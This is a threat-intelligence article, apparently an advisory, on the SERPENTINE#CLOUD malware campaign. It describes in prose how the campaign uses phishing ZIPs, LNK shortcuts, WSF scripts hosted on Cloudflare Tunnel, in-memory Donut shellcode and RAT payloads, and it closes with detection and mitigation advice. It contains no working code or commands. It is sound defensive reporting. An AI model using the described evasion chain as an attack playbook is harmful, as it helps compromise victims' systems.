SERPENTINE#CLOUD: Sophisticated Malware Campaign Abusing Cloudflare Tunnels

Overview

A new malware operation, dubbed SERPENTINE#CLOUD, is actively exploiting Cloudflare Tunnel subdomains to distribute Remote Access Trojans (RATs) through phishing campaigns. By using trusted infrastructure and fileless techniques, attackers are making it harder for security systems to detect the threat.

Attack Chain Breakdown

1. Phishing Email Delivery
   Victims receive emails disguised as invoice or payment notifications. These contain links to ZIP files hosted on attacker-controlled servers.
2. Malicious LNK Shortcut
   Inside the ZIP is a .lnk (shortcut) file pretending to be a document. When clicked, it launches a command script.
3. Cloudflare Tunnel-Based Payload Hosting
   The script connects to a Cloudflare Tunnel subdomain (*.trycloudflare.com) using WebDAV to download a Windows Script File (WSF), avoiding static URL detection.
4. Fileless Execution
   The WSF invokes a Python-based loader that executes shellcode in memory using Donut (an open-source loader). The final payload is typically AsyncRAT or Remcos, both powerful remote access tools.
5. Living-off-the-Land (LOTL) Techniques
   Attackers use built-in Windows tools such as cscript.exe, combined with script obfuscation and in-memory execution, to evade antivirus software.

Campaign Scope and Background

• Target Regions: United States, UK, Germany, other parts of Europe and Asia.
• Attribution: Unconfirmed. The presence of English-language comments in the scripts suggests fluent operators, but no firm link to nation-state actors has been made.
• Context: This campaign builds on a trend seen since 2024, where attackers exploit Cloudflare Tunnel to host malware like GuLoader, Xworm, AsyncRAT, VenomRAT, and Remcos.

Why Cloudflare Tunnel Is Being Exploited

• Legitimacy: Cloudflare domains often bypass URL filters due to their reputation.
• Encrypted & Disposable: These tunnels use encrypted connections and allow attackers to set up short-lived infrastructure that’s hard to trace.
• Detection Gaps: Many organizations allow Cloudflare domains and may not inspect encrypted traffic closely enough.

Detection and Mitigation Recommendations

• Email Security: Implement advanced email filtering and block ZIP attachments containing .lnk or .wsf files.
• Domain Control: Restrict or block access to trycloudflare.com and other dynamic tunnel domains not essential for business.
• Script Execution Policies: Limit or disable usage of scripting engines like cscript.exe and Python where possible.
• Endpoint Detection and Response (EDR): Use tools capable of identifying in-memory execution and shellcode injection.
• Network Analysis: Monitor for abnormal WebDAV connections or traffic to newly created subdomains.

Final Thoughts

The SERPENTINE#CLOUD campaign demonstrates how threat actors continue to evolve, blending legitimate tools with evasive tactics. As more attackers move away from traditional command-and-control infrastructures in favor of tunneling services, defenders must adapt with stronger detection at the network and behavioral level.